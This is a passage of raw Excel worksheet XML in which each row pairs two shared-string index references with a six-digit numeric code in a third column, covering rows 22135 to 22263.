        <v>13947</v>
      </c>
      <c r="C22135" s="15">
        <v>870490</v>
      </c>
    </row>
    <row r="22136" spans="1:3">
      <c r="A22136" s="28" t="s">
        <v>24570</v>
      </c>
      <c r="B22136" s="14" t="s">
        <v>13947</v>
      </c>
      <c r="C22136" s="15">
        <v>870550</v>
      </c>
    </row>
    <row r="22137" spans="1:3">
      <c r="A22137" s="28" t="s">
        <v>24570</v>
      </c>
      <c r="B22137" s="14" t="s">
        <v>13947</v>
      </c>
      <c r="C22137" s="15">
        <v>870560</v>
      </c>
    </row>
    <row r="22138" spans="1:3">
      <c r="A22138" s="28" t="s">
        <v>24570</v>
      </c>
      <c r="B22138" s="14" t="s">
        <v>13947</v>
      </c>
      <c r="C22138" s="15">
        <v>870570</v>
      </c>
    </row>
    <row r="22139" spans="1:3">
      <c r="A22139" s="28" t="s">
        <v>24570</v>
      </c>
      <c r="B22139" s="14" t="s">
        <v>13947</v>
      </c>
      <c r="C22139" s="15">
        <v>870580</v>
      </c>
    </row>
    <row r="22140" spans="1:3">
      <c r="A22140" s="28" t="s">
        <v>24570</v>
      </c>
      <c r="B22140" s="14" t="s">
        <v>13947</v>
      </c>
      <c r="C22140" s="15">
        <v>870590</v>
      </c>
    </row>
    <row r="22141" spans="1:3">
      <c r="A22141" s="28" t="s">
        <v>24570</v>
      </c>
      <c r="B22141" s="14" t="s">
        <v>13947</v>
      </c>
      <c r="C22141" s="15">
        <v>870626</v>
      </c>
    </row>
    <row r="22142" spans="1:3">
      <c r="A22142" s="28" t="s">
        <v>24570</v>
      </c>
      <c r="B22142" s="14" t="s">
        <v>13947</v>
      </c>
      <c r="C22142" s="15">
        <v>870660</v>
      </c>
    </row>
    <row r="22143" spans="1:3">
      <c r="A22143" s="28" t="s">
        <v>24570</v>
      </c>
      <c r="B22143" s="14" t="s">
        <v>13947</v>
      </c>
      <c r="C22143" s="15">
        <v>870667</v>
      </c>
    </row>
    <row r="22144" spans="1:3">
      <c r="A22144" s="28" t="s">
        <v>24570</v>
      </c>
      <c r="B22144" s="14" t="s">
        <v>13947</v>
      </c>
      <c r="C22144" s="15">
        <v>870670</v>
      </c>
    </row>
    <row r="22145" spans="1:3">
      <c r="A22145" s="28" t="s">
        <v>24570</v>
      </c>
      <c r="B22145" s="14" t="s">
        <v>13947</v>
      </c>
      <c r="C22145" s="15">
        <v>870674</v>
      </c>
    </row>
    <row r="22146" spans="1:3">
      <c r="A22146" s="28" t="s">
        <v>24570</v>
      </c>
      <c r="B22146" s="14" t="s">
        <v>13947</v>
      </c>
      <c r="C22146" s="15">
        <v>870755</v>
      </c>
    </row>
    <row r="22147" spans="1:3">
      <c r="A22147" s="28" t="s">
        <v>24570</v>
      </c>
      <c r="B22147" s="14" t="s">
        <v>13947</v>
      </c>
      <c r="C22147" s="15">
        <v>870767</v>
      </c>
    </row>
    <row r="22148" spans="1:3">
      <c r="A22148" s="28" t="s">
        <v>24570</v>
      </c>
      <c r="B22148" s="14" t="s">
        <v>13947</v>
      </c>
      <c r="C22148" s="15">
        <v>870845</v>
      </c>
    </row>
    <row r="22149" spans="1:3">
      <c r="A22149" s="28" t="s">
        <v>24570</v>
      </c>
      <c r="B22149" s="14" t="s">
        <v>13947</v>
      </c>
      <c r="C22149" s="15">
        <v>870855</v>
      </c>
    </row>
    <row r="22150" spans="1:3">
      <c r="A22150" s="28" t="s">
        <v>27011</v>
      </c>
      <c r="B22150" s="14" t="s">
        <v>17487</v>
      </c>
      <c r="C22150" s="15">
        <v>871290</v>
      </c>
    </row>
    <row r="22151" spans="1:3">
      <c r="A22151" s="28" t="s">
        <v>27012</v>
      </c>
      <c r="B22151" s="14" t="s">
        <v>17487</v>
      </c>
      <c r="C22151" s="15">
        <v>871480</v>
      </c>
    </row>
    <row r="22152" spans="1:3">
      <c r="A22152" s="28" t="s">
        <v>27011</v>
      </c>
      <c r="B22152" s="14" t="s">
        <v>17487</v>
      </c>
      <c r="C22152" s="15">
        <v>871490</v>
      </c>
    </row>
    <row r="22153" spans="1:3">
      <c r="A22153" s="28" t="s">
        <v>27011</v>
      </c>
      <c r="B22153" s="14" t="s">
        <v>17487</v>
      </c>
      <c r="C22153" s="15">
        <v>871545</v>
      </c>
    </row>
    <row r="22154" spans="1:3">
      <c r="A22154" s="28" t="s">
        <v>27012</v>
      </c>
      <c r="B22154" s="14" t="s">
        <v>17487</v>
      </c>
      <c r="C22154" s="15">
        <v>871580</v>
      </c>
    </row>
    <row r="22155" spans="1:3">
      <c r="A22155" s="28" t="s">
        <v>27011</v>
      </c>
      <c r="B22155" s="14" t="s">
        <v>17487</v>
      </c>
      <c r="C22155" s="15">
        <v>871590</v>
      </c>
    </row>
    <row r="22156" spans="1:3">
      <c r="A22156" s="28" t="s">
        <v>27011</v>
      </c>
      <c r="B22156" s="14" t="s">
        <v>17487</v>
      </c>
      <c r="C22156" s="15">
        <v>871667</v>
      </c>
    </row>
    <row r="22157" spans="1:3">
      <c r="A22157" s="28" t="s">
        <v>27011</v>
      </c>
      <c r="B22157" s="14" t="s">
        <v>17487</v>
      </c>
      <c r="C22157" s="15">
        <v>871674</v>
      </c>
    </row>
    <row r="22158" spans="1:3">
      <c r="A22158" s="28" t="s">
        <v>27011</v>
      </c>
      <c r="B22158" s="14" t="s">
        <v>17487</v>
      </c>
      <c r="C22158" s="15">
        <v>871767</v>
      </c>
    </row>
    <row r="22159" spans="1:3">
      <c r="A22159" s="28" t="s">
        <v>27011</v>
      </c>
      <c r="B22159" s="14" t="s">
        <v>17487</v>
      </c>
      <c r="C22159" s="15">
        <v>871867</v>
      </c>
    </row>
    <row r="22160" spans="1:3">
      <c r="A22160" s="28" t="s">
        <v>27013</v>
      </c>
      <c r="B22160" s="14" t="s">
        <v>17488</v>
      </c>
      <c r="C22160" s="15">
        <v>872460</v>
      </c>
    </row>
    <row r="22161" spans="1:3">
      <c r="A22161" s="28" t="s">
        <v>27014</v>
      </c>
      <c r="B22161" s="14" t="s">
        <v>17489</v>
      </c>
      <c r="C22161" s="15">
        <v>873000</v>
      </c>
    </row>
    <row r="22162" spans="1:3">
      <c r="A22162" s="28" t="s">
        <v>27014</v>
      </c>
      <c r="B22162" s="14" t="s">
        <v>17489</v>
      </c>
      <c r="C22162" s="15">
        <v>873290</v>
      </c>
    </row>
    <row r="22163" spans="1:3">
      <c r="A22163" s="28" t="s">
        <v>27014</v>
      </c>
      <c r="B22163" s="14" t="s">
        <v>17489</v>
      </c>
      <c r="C22163" s="15">
        <v>873460</v>
      </c>
    </row>
    <row r="22164" spans="1:3">
      <c r="A22164" s="28" t="s">
        <v>27014</v>
      </c>
      <c r="B22164" s="14" t="s">
        <v>17489</v>
      </c>
      <c r="C22164" s="15">
        <v>873480</v>
      </c>
    </row>
    <row r="22165" spans="1:3">
      <c r="A22165" s="28" t="s">
        <v>27014</v>
      </c>
      <c r="B22165" s="14" t="s">
        <v>17489</v>
      </c>
      <c r="C22165" s="15">
        <v>873490</v>
      </c>
    </row>
    <row r="22166" spans="1:3">
      <c r="A22166" s="28" t="s">
        <v>27015</v>
      </c>
      <c r="B22166" s="14" t="s">
        <v>17489</v>
      </c>
      <c r="C22166" s="15">
        <v>873550</v>
      </c>
    </row>
    <row r="22167" spans="1:3">
      <c r="A22167" s="28" t="s">
        <v>27014</v>
      </c>
      <c r="B22167" s="14" t="s">
        <v>17489</v>
      </c>
      <c r="C22167" s="15">
        <v>873560</v>
      </c>
    </row>
    <row r="22168" spans="1:3">
      <c r="A22168" s="28" t="s">
        <v>27014</v>
      </c>
      <c r="B22168" s="14" t="s">
        <v>17489</v>
      </c>
      <c r="C22168" s="15">
        <v>873570</v>
      </c>
    </row>
    <row r="22169" spans="1:3">
      <c r="A22169" s="28" t="s">
        <v>27014</v>
      </c>
      <c r="B22169" s="14" t="s">
        <v>17489</v>
      </c>
      <c r="C22169" s="15">
        <v>873580</v>
      </c>
    </row>
    <row r="22170" spans="1:3">
      <c r="A22170" s="28" t="s">
        <v>27014</v>
      </c>
      <c r="B22170" s="14" t="s">
        <v>17489</v>
      </c>
      <c r="C22170" s="15">
        <v>873590</v>
      </c>
    </row>
    <row r="22171" spans="1:3">
      <c r="A22171" s="28" t="s">
        <v>27014</v>
      </c>
      <c r="B22171" s="14" t="s">
        <v>17489</v>
      </c>
      <c r="C22171" s="15">
        <v>873645</v>
      </c>
    </row>
    <row r="22172" spans="1:3">
      <c r="A22172" s="28" t="s">
        <v>27014</v>
      </c>
      <c r="B22172" s="14" t="s">
        <v>17489</v>
      </c>
      <c r="C22172" s="15">
        <v>873660</v>
      </c>
    </row>
    <row r="22173" spans="1:3">
      <c r="A22173" s="28" t="s">
        <v>27014</v>
      </c>
      <c r="B22173" s="14" t="s">
        <v>17489</v>
      </c>
      <c r="C22173" s="15">
        <v>873667</v>
      </c>
    </row>
    <row r="22174" spans="1:3">
      <c r="A22174" s="28" t="s">
        <v>27014</v>
      </c>
      <c r="B22174" s="14" t="s">
        <v>17489</v>
      </c>
      <c r="C22174" s="15">
        <v>873670</v>
      </c>
    </row>
    <row r="22175" spans="1:3">
      <c r="A22175" s="28" t="s">
        <v>27014</v>
      </c>
      <c r="B22175" s="14" t="s">
        <v>17489</v>
      </c>
      <c r="C22175" s="15">
        <v>873674</v>
      </c>
    </row>
    <row r="22176" spans="1:3">
      <c r="A22176" s="28" t="s">
        <v>27014</v>
      </c>
      <c r="B22176" s="14" t="s">
        <v>17489</v>
      </c>
      <c r="C22176" s="15">
        <v>873755</v>
      </c>
    </row>
    <row r="22177" spans="1:3">
      <c r="A22177" s="28" t="s">
        <v>27014</v>
      </c>
      <c r="B22177" s="14" t="s">
        <v>17489</v>
      </c>
      <c r="C22177" s="15">
        <v>873767</v>
      </c>
    </row>
    <row r="22178" spans="1:3">
      <c r="A22178" s="28" t="s">
        <v>27016</v>
      </c>
      <c r="B22178" s="14" t="s">
        <v>17489</v>
      </c>
      <c r="C22178" s="15">
        <v>873845</v>
      </c>
    </row>
    <row r="22179" spans="1:3">
      <c r="A22179" s="28" t="s">
        <v>27014</v>
      </c>
      <c r="B22179" s="14" t="s">
        <v>17489</v>
      </c>
      <c r="C22179" s="15">
        <v>873867</v>
      </c>
    </row>
    <row r="22180" spans="1:3">
      <c r="A22180" s="28" t="s">
        <v>27017</v>
      </c>
      <c r="B22180" s="14" t="s">
        <v>17490</v>
      </c>
      <c r="C22180" s="15">
        <v>874000</v>
      </c>
    </row>
    <row r="22181" spans="1:3">
      <c r="A22181" s="28" t="s">
        <v>27017</v>
      </c>
      <c r="B22181" s="14" t="s">
        <v>17490</v>
      </c>
      <c r="C22181" s="15">
        <v>874290</v>
      </c>
    </row>
    <row r="22182" spans="1:3">
      <c r="A22182" s="28" t="s">
        <v>27017</v>
      </c>
      <c r="B22182" s="14" t="s">
        <v>17490</v>
      </c>
      <c r="C22182" s="15">
        <v>874490</v>
      </c>
    </row>
    <row r="22183" spans="1:3">
      <c r="A22183" s="28" t="s">
        <v>27018</v>
      </c>
      <c r="B22183" s="14" t="s">
        <v>17490</v>
      </c>
      <c r="C22183" s="15">
        <v>874580</v>
      </c>
    </row>
    <row r="22184" spans="1:3">
      <c r="A22184" s="28" t="s">
        <v>27017</v>
      </c>
      <c r="B22184" s="14" t="s">
        <v>17490</v>
      </c>
      <c r="C22184" s="15">
        <v>874590</v>
      </c>
    </row>
    <row r="22185" spans="1:3">
      <c r="A22185" s="28" t="s">
        <v>27017</v>
      </c>
      <c r="B22185" s="14" t="s">
        <v>17490</v>
      </c>
      <c r="C22185" s="15">
        <v>874667</v>
      </c>
    </row>
    <row r="22186" spans="1:3">
      <c r="A22186" s="28" t="s">
        <v>27017</v>
      </c>
      <c r="B22186" s="14" t="s">
        <v>17490</v>
      </c>
      <c r="C22186" s="15">
        <v>874674</v>
      </c>
    </row>
    <row r="22187" spans="1:3">
      <c r="A22187" s="28" t="s">
        <v>27017</v>
      </c>
      <c r="B22187" s="14" t="s">
        <v>17490</v>
      </c>
      <c r="C22187" s="15">
        <v>874767</v>
      </c>
    </row>
    <row r="22188" spans="1:3">
      <c r="A22188" s="28" t="s">
        <v>27017</v>
      </c>
      <c r="B22188" s="14" t="s">
        <v>17490</v>
      </c>
      <c r="C22188" s="15">
        <v>874867</v>
      </c>
    </row>
    <row r="22189" spans="1:3">
      <c r="A22189" s="28" t="s">
        <v>27019</v>
      </c>
      <c r="B22189" s="14" t="s">
        <v>17491</v>
      </c>
      <c r="C22189" s="15">
        <v>875000</v>
      </c>
    </row>
    <row r="22190" spans="1:3">
      <c r="A22190" s="28" t="s">
        <v>27019</v>
      </c>
      <c r="B22190" s="14" t="s">
        <v>17491</v>
      </c>
      <c r="C22190" s="15">
        <v>875290</v>
      </c>
    </row>
    <row r="22191" spans="1:3">
      <c r="A22191" s="28" t="s">
        <v>27019</v>
      </c>
      <c r="B22191" s="14" t="s">
        <v>17491</v>
      </c>
      <c r="C22191" s="15">
        <v>875460</v>
      </c>
    </row>
    <row r="22192" spans="1:3">
      <c r="A22192" s="28" t="s">
        <v>27019</v>
      </c>
      <c r="B22192" s="14" t="s">
        <v>17491</v>
      </c>
      <c r="C22192" s="15">
        <v>875480</v>
      </c>
    </row>
    <row r="22193" spans="1:3">
      <c r="A22193" s="28" t="s">
        <v>27019</v>
      </c>
      <c r="B22193" s="14" t="s">
        <v>17491</v>
      </c>
      <c r="C22193" s="15">
        <v>875490</v>
      </c>
    </row>
    <row r="22194" spans="1:3">
      <c r="A22194" s="28" t="s">
        <v>27019</v>
      </c>
      <c r="B22194" s="14" t="s">
        <v>17491</v>
      </c>
      <c r="C22194" s="15">
        <v>875550</v>
      </c>
    </row>
    <row r="22195" spans="1:3">
      <c r="A22195" s="28" t="s">
        <v>27019</v>
      </c>
      <c r="B22195" s="14" t="s">
        <v>17491</v>
      </c>
      <c r="C22195" s="15">
        <v>875560</v>
      </c>
    </row>
    <row r="22196" spans="1:3">
      <c r="A22196" s="28" t="s">
        <v>27019</v>
      </c>
      <c r="B22196" s="14" t="s">
        <v>17491</v>
      </c>
      <c r="C22196" s="15">
        <v>875570</v>
      </c>
    </row>
    <row r="22197" spans="1:3">
      <c r="A22197" s="28" t="s">
        <v>27019</v>
      </c>
      <c r="B22197" s="14" t="s">
        <v>17491</v>
      </c>
      <c r="C22197" s="15">
        <v>875580</v>
      </c>
    </row>
    <row r="22198" spans="1:3">
      <c r="A22198" s="28" t="s">
        <v>27019</v>
      </c>
      <c r="B22198" s="14" t="s">
        <v>17491</v>
      </c>
      <c r="C22198" s="15">
        <v>875590</v>
      </c>
    </row>
    <row r="22199" spans="1:3">
      <c r="A22199" s="28" t="s">
        <v>27019</v>
      </c>
      <c r="B22199" s="14" t="s">
        <v>17491</v>
      </c>
      <c r="C22199" s="15">
        <v>875645</v>
      </c>
    </row>
    <row r="22200" spans="1:3">
      <c r="A22200" s="28" t="s">
        <v>27019</v>
      </c>
      <c r="B22200" s="14" t="s">
        <v>17491</v>
      </c>
      <c r="C22200" s="15">
        <v>875660</v>
      </c>
    </row>
    <row r="22201" spans="1:3">
      <c r="A22201" s="28" t="s">
        <v>27019</v>
      </c>
      <c r="B22201" s="14" t="s">
        <v>17491</v>
      </c>
      <c r="C22201" s="15">
        <v>875667</v>
      </c>
    </row>
    <row r="22202" spans="1:3">
      <c r="A22202" s="28" t="s">
        <v>27019</v>
      </c>
      <c r="B22202" s="14" t="s">
        <v>17491</v>
      </c>
      <c r="C22202" s="15">
        <v>875670</v>
      </c>
    </row>
    <row r="22203" spans="1:3">
      <c r="A22203" s="28" t="s">
        <v>27019</v>
      </c>
      <c r="B22203" s="14" t="s">
        <v>17491</v>
      </c>
      <c r="C22203" s="15">
        <v>875674</v>
      </c>
    </row>
    <row r="22204" spans="1:3">
      <c r="A22204" s="28" t="s">
        <v>27019</v>
      </c>
      <c r="B22204" s="14" t="s">
        <v>17491</v>
      </c>
      <c r="C22204" s="15">
        <v>875755</v>
      </c>
    </row>
    <row r="22205" spans="1:3">
      <c r="A22205" s="28" t="s">
        <v>27019</v>
      </c>
      <c r="B22205" s="14" t="s">
        <v>17491</v>
      </c>
      <c r="C22205" s="15">
        <v>875767</v>
      </c>
    </row>
    <row r="22206" spans="1:3">
      <c r="A22206" s="28" t="s">
        <v>27019</v>
      </c>
      <c r="B22206" s="14" t="s">
        <v>17491</v>
      </c>
      <c r="C22206" s="15">
        <v>875845</v>
      </c>
    </row>
    <row r="22207" spans="1:3">
      <c r="A22207" s="28" t="s">
        <v>27019</v>
      </c>
      <c r="B22207" s="14" t="s">
        <v>17491</v>
      </c>
      <c r="C22207" s="15">
        <v>875867</v>
      </c>
    </row>
    <row r="22208" spans="1:3">
      <c r="A22208" s="28" t="s">
        <v>27020</v>
      </c>
      <c r="B22208" s="14" t="s">
        <v>17492</v>
      </c>
      <c r="C22208" s="15">
        <v>876000</v>
      </c>
    </row>
    <row r="22209" spans="1:3">
      <c r="A22209" s="28" t="s">
        <v>27020</v>
      </c>
      <c r="B22209" s="14" t="s">
        <v>17492</v>
      </c>
      <c r="C22209" s="15">
        <v>876290</v>
      </c>
    </row>
    <row r="22210" spans="1:3">
      <c r="A22210" s="28" t="s">
        <v>27020</v>
      </c>
      <c r="B22210" s="14" t="s">
        <v>17492</v>
      </c>
      <c r="C22210" s="15">
        <v>876460</v>
      </c>
    </row>
    <row r="22211" spans="1:3">
      <c r="A22211" s="28" t="s">
        <v>27020</v>
      </c>
      <c r="B22211" s="14" t="s">
        <v>17492</v>
      </c>
      <c r="C22211" s="15">
        <v>876480</v>
      </c>
    </row>
    <row r="22212" spans="1:3">
      <c r="A22212" s="28" t="s">
        <v>27020</v>
      </c>
      <c r="B22212" s="14" t="s">
        <v>17492</v>
      </c>
      <c r="C22212" s="15">
        <v>876490</v>
      </c>
    </row>
    <row r="22213" spans="1:3">
      <c r="A22213" s="28" t="s">
        <v>27020</v>
      </c>
      <c r="B22213" s="14" t="s">
        <v>17492</v>
      </c>
      <c r="C22213" s="15">
        <v>876545</v>
      </c>
    </row>
    <row r="22214" spans="1:3">
      <c r="A22214" s="28" t="s">
        <v>27020</v>
      </c>
      <c r="B22214" s="14" t="s">
        <v>17492</v>
      </c>
      <c r="C22214" s="15">
        <v>876550</v>
      </c>
    </row>
    <row r="22215" spans="1:3">
      <c r="A22215" s="28" t="s">
        <v>27020</v>
      </c>
      <c r="B22215" s="14" t="s">
        <v>17492</v>
      </c>
      <c r="C22215" s="15">
        <v>876560</v>
      </c>
    </row>
    <row r="22216" spans="1:3">
      <c r="A22216" s="28" t="s">
        <v>27020</v>
      </c>
      <c r="B22216" s="14" t="s">
        <v>17492</v>
      </c>
      <c r="C22216" s="15">
        <v>876570</v>
      </c>
    </row>
    <row r="22217" spans="1:3">
      <c r="A22217" s="28" t="s">
        <v>27020</v>
      </c>
      <c r="B22217" s="14" t="s">
        <v>17492</v>
      </c>
      <c r="C22217" s="15">
        <v>876580</v>
      </c>
    </row>
    <row r="22218" spans="1:3">
      <c r="A22218" s="28" t="s">
        <v>27020</v>
      </c>
      <c r="B22218" s="14" t="s">
        <v>17492</v>
      </c>
      <c r="C22218" s="15">
        <v>876590</v>
      </c>
    </row>
    <row r="22219" spans="1:3">
      <c r="A22219" s="28" t="s">
        <v>27020</v>
      </c>
      <c r="B22219" s="14" t="s">
        <v>17492</v>
      </c>
      <c r="C22219" s="15">
        <v>876626</v>
      </c>
    </row>
    <row r="22220" spans="1:3">
      <c r="A22220" s="28" t="s">
        <v>27020</v>
      </c>
      <c r="B22220" s="14" t="s">
        <v>17492</v>
      </c>
      <c r="C22220" s="15">
        <v>876645</v>
      </c>
    </row>
    <row r="22221" spans="1:3">
      <c r="A22221" s="28" t="s">
        <v>27020</v>
      </c>
      <c r="B22221" s="14" t="s">
        <v>17492</v>
      </c>
      <c r="C22221" s="15">
        <v>876660</v>
      </c>
    </row>
    <row r="22222" spans="1:3">
      <c r="A22222" s="28" t="s">
        <v>27020</v>
      </c>
      <c r="B22222" s="14" t="s">
        <v>17492</v>
      </c>
      <c r="C22222" s="15">
        <v>876667</v>
      </c>
    </row>
    <row r="22223" spans="1:3">
      <c r="A22223" s="28" t="s">
        <v>27020</v>
      </c>
      <c r="B22223" s="14" t="s">
        <v>17492</v>
      </c>
      <c r="C22223" s="15">
        <v>876670</v>
      </c>
    </row>
    <row r="22224" spans="1:3">
      <c r="A22224" s="28" t="s">
        <v>27020</v>
      </c>
      <c r="B22224" s="14" t="s">
        <v>17492</v>
      </c>
      <c r="C22224" s="15">
        <v>876674</v>
      </c>
    </row>
    <row r="22225" spans="1:3">
      <c r="A22225" s="28" t="s">
        <v>27020</v>
      </c>
      <c r="B22225" s="14" t="s">
        <v>17492</v>
      </c>
      <c r="C22225" s="15">
        <v>876755</v>
      </c>
    </row>
    <row r="22226" spans="1:3">
      <c r="A22226" s="28" t="s">
        <v>27020</v>
      </c>
      <c r="B22226" s="14" t="s">
        <v>17492</v>
      </c>
      <c r="C22226" s="15">
        <v>876845</v>
      </c>
    </row>
    <row r="22227" spans="1:3">
      <c r="A22227" s="28" t="s">
        <v>27020</v>
      </c>
      <c r="B22227" s="14" t="s">
        <v>17492</v>
      </c>
      <c r="C22227" s="15">
        <v>876867</v>
      </c>
    </row>
    <row r="22228" spans="1:3">
      <c r="A22228" s="28" t="s">
        <v>20165</v>
      </c>
      <c r="B22228" s="14" t="s">
        <v>9187</v>
      </c>
      <c r="C22228" s="15">
        <v>877290</v>
      </c>
    </row>
    <row r="22229" spans="1:3">
      <c r="A22229" s="28" t="s">
        <v>20165</v>
      </c>
      <c r="B22229" s="14" t="s">
        <v>9187</v>
      </c>
      <c r="C22229" s="15">
        <v>877460</v>
      </c>
    </row>
    <row r="22230" spans="1:3">
      <c r="A22230" s="28" t="s">
        <v>20165</v>
      </c>
      <c r="B22230" s="14" t="s">
        <v>9187</v>
      </c>
      <c r="C22230" s="15">
        <v>877550</v>
      </c>
    </row>
    <row r="22231" spans="1:3">
      <c r="A22231" s="28" t="s">
        <v>20165</v>
      </c>
      <c r="B22231" s="14" t="s">
        <v>9187</v>
      </c>
      <c r="C22231" s="15">
        <v>877570</v>
      </c>
    </row>
    <row r="22232" spans="1:3">
      <c r="A22232" s="28" t="s">
        <v>20165</v>
      </c>
      <c r="B22232" s="14" t="s">
        <v>9187</v>
      </c>
      <c r="C22232" s="15">
        <v>877626</v>
      </c>
    </row>
    <row r="22233" spans="1:3">
      <c r="A22233" s="28" t="s">
        <v>20165</v>
      </c>
      <c r="B22233" s="14" t="s">
        <v>9187</v>
      </c>
      <c r="C22233" s="15">
        <v>877660</v>
      </c>
    </row>
    <row r="22234" spans="1:3">
      <c r="A22234" s="28" t="s">
        <v>20165</v>
      </c>
      <c r="B22234" s="14" t="s">
        <v>9187</v>
      </c>
      <c r="C22234" s="15">
        <v>877670</v>
      </c>
    </row>
    <row r="22235" spans="1:3" ht="25.5">
      <c r="A22235" s="28" t="s">
        <v>27021</v>
      </c>
      <c r="B22235" s="14" t="s">
        <v>17493</v>
      </c>
      <c r="C22235" s="15">
        <v>878460</v>
      </c>
    </row>
    <row r="22236" spans="1:3" ht="25.5">
      <c r="A22236" s="28" t="s">
        <v>27021</v>
      </c>
      <c r="B22236" s="14" t="s">
        <v>17493</v>
      </c>
      <c r="C22236" s="15">
        <v>878480</v>
      </c>
    </row>
    <row r="22237" spans="1:3" ht="25.5">
      <c r="A22237" s="28" t="s">
        <v>27021</v>
      </c>
      <c r="B22237" s="14" t="s">
        <v>17493</v>
      </c>
      <c r="C22237" s="15">
        <v>878490</v>
      </c>
    </row>
    <row r="22238" spans="1:3" ht="25.5">
      <c r="A22238" s="28" t="s">
        <v>27021</v>
      </c>
      <c r="B22238" s="14" t="s">
        <v>17493</v>
      </c>
      <c r="C22238" s="15">
        <v>878550</v>
      </c>
    </row>
    <row r="22239" spans="1:3" ht="25.5">
      <c r="A22239" s="28" t="s">
        <v>27021</v>
      </c>
      <c r="B22239" s="14" t="s">
        <v>17493</v>
      </c>
      <c r="C22239" s="15">
        <v>878560</v>
      </c>
    </row>
    <row r="22240" spans="1:3" ht="25.5">
      <c r="A22240" s="28" t="s">
        <v>27021</v>
      </c>
      <c r="B22240" s="14" t="s">
        <v>17493</v>
      </c>
      <c r="C22240" s="15">
        <v>878570</v>
      </c>
    </row>
    <row r="22241" spans="1:3" ht="25.5">
      <c r="A22241" s="28" t="s">
        <v>27021</v>
      </c>
      <c r="B22241" s="14" t="s">
        <v>17493</v>
      </c>
      <c r="C22241" s="15">
        <v>878580</v>
      </c>
    </row>
    <row r="22242" spans="1:3" ht="25.5">
      <c r="A22242" s="28" t="s">
        <v>27022</v>
      </c>
      <c r="B22242" s="14" t="s">
        <v>17493</v>
      </c>
      <c r="C22242" s="15">
        <v>878590</v>
      </c>
    </row>
    <row r="22243" spans="1:3" ht="25.5">
      <c r="A22243" s="28" t="s">
        <v>27021</v>
      </c>
      <c r="B22243" s="14" t="s">
        <v>17493</v>
      </c>
      <c r="C22243" s="15">
        <v>878660</v>
      </c>
    </row>
    <row r="22244" spans="1:3" ht="25.5">
      <c r="A22244" s="28" t="s">
        <v>27021</v>
      </c>
      <c r="B22244" s="14" t="s">
        <v>17493</v>
      </c>
      <c r="C22244" s="15">
        <v>878670</v>
      </c>
    </row>
    <row r="22245" spans="1:3">
      <c r="A22245" s="28" t="s">
        <v>27023</v>
      </c>
      <c r="B22245" s="14" t="s">
        <v>17494</v>
      </c>
      <c r="C22245" s="15">
        <v>880055</v>
      </c>
    </row>
    <row r="22246" spans="1:3">
      <c r="A22246" s="28" t="s">
        <v>27023</v>
      </c>
      <c r="B22246" s="14" t="s">
        <v>17494</v>
      </c>
      <c r="C22246" s="15">
        <v>880290</v>
      </c>
    </row>
    <row r="22247" spans="1:3">
      <c r="A22247" s="28" t="s">
        <v>27023</v>
      </c>
      <c r="B22247" s="14" t="s">
        <v>17494</v>
      </c>
      <c r="C22247" s="15">
        <v>880460</v>
      </c>
    </row>
    <row r="22248" spans="1:3">
      <c r="A22248" s="28" t="s">
        <v>27023</v>
      </c>
      <c r="B22248" s="14" t="s">
        <v>17494</v>
      </c>
      <c r="C22248" s="15">
        <v>880480</v>
      </c>
    </row>
    <row r="22249" spans="1:3">
      <c r="A22249" s="28" t="s">
        <v>27023</v>
      </c>
      <c r="B22249" s="14" t="s">
        <v>17494</v>
      </c>
      <c r="C22249" s="15">
        <v>880490</v>
      </c>
    </row>
    <row r="22250" spans="1:3">
      <c r="A22250" s="28" t="s">
        <v>27023</v>
      </c>
      <c r="B22250" s="14" t="s">
        <v>17494</v>
      </c>
      <c r="C22250" s="15">
        <v>880550</v>
      </c>
    </row>
    <row r="22251" spans="1:3">
      <c r="A22251" s="28" t="s">
        <v>27023</v>
      </c>
      <c r="B22251" s="14" t="s">
        <v>17494</v>
      </c>
      <c r="C22251" s="15">
        <v>880560</v>
      </c>
    </row>
    <row r="22252" spans="1:3">
      <c r="A22252" s="28" t="s">
        <v>27023</v>
      </c>
      <c r="B22252" s="14" t="s">
        <v>17494</v>
      </c>
      <c r="C22252" s="15">
        <v>880570</v>
      </c>
    </row>
    <row r="22253" spans="1:3">
      <c r="A22253" s="28" t="s">
        <v>27023</v>
      </c>
      <c r="B22253" s="14" t="s">
        <v>17494</v>
      </c>
      <c r="C22253" s="15">
        <v>880580</v>
      </c>
    </row>
    <row r="22254" spans="1:3">
      <c r="A22254" s="28" t="s">
        <v>27023</v>
      </c>
      <c r="B22254" s="14" t="s">
        <v>17494</v>
      </c>
      <c r="C22254" s="15">
        <v>880590</v>
      </c>
    </row>
    <row r="22255" spans="1:3">
      <c r="A22255" s="28" t="s">
        <v>27023</v>
      </c>
      <c r="B22255" s="14" t="s">
        <v>17494</v>
      </c>
      <c r="C22255" s="15">
        <v>880626</v>
      </c>
    </row>
    <row r="22256" spans="1:3">
      <c r="A22256" s="28" t="s">
        <v>27023</v>
      </c>
      <c r="B22256" s="14" t="s">
        <v>17494</v>
      </c>
      <c r="C22256" s="15">
        <v>880660</v>
      </c>
    </row>
    <row r="22257" spans="1:3">
      <c r="A22257" s="28" t="s">
        <v>27023</v>
      </c>
      <c r="B22257" s="14" t="s">
        <v>17494</v>
      </c>
      <c r="C22257" s="15">
        <v>880667</v>
      </c>
    </row>
    <row r="22258" spans="1:3">
      <c r="A22258" s="28" t="s">
        <v>27023</v>
      </c>
      <c r="B22258" s="14" t="s">
        <v>17494</v>
      </c>
      <c r="C22258" s="15">
        <v>880670</v>
      </c>
    </row>
    <row r="22259" spans="1:3">
      <c r="A22259" s="28" t="s">
        <v>27023</v>
      </c>
      <c r="B22259" s="14" t="s">
        <v>17494</v>
      </c>
      <c r="C22259" s="15">
        <v>880755</v>
      </c>
    </row>
    <row r="22260" spans="1:3">
      <c r="A22260" s="28" t="s">
        <v>27023</v>
      </c>
      <c r="B22260" s="14" t="s">
        <v>17494</v>
      </c>
      <c r="C22260" s="15">
        <v>880767</v>
      </c>
    </row>
    <row r="22261" spans="1:3">
      <c r="A22261" s="28" t="s">
        <v>27024</v>
      </c>
      <c r="B22261" s="14" t="s">
        <v>17494</v>
      </c>
      <c r="C22261" s="15">
        <v>880845</v>
      </c>
    </row>
    <row r="22262" spans="1:3">
      <c r="A22262" s="28" t="s">
        <v>27023</v>
      </c>
      <c r="B22262" s="14" t="s">
        <v>17494</v>
      </c>
      <c r="C22262" s="15">
        <v>880855</v>
      </c>
    </row>
    <row r="22263" spans="1:3">
      <c r="A22263" s="28" t="s">
        <v>27025</v>
      </c>
      <c r="B22263" s="14" t="s">
        <v>17495</v>
      </c>
      <c r="C22263" s="15">
        <v>881490</v>
      </c>
    </row>
    <row r="22264" spans="1:3">
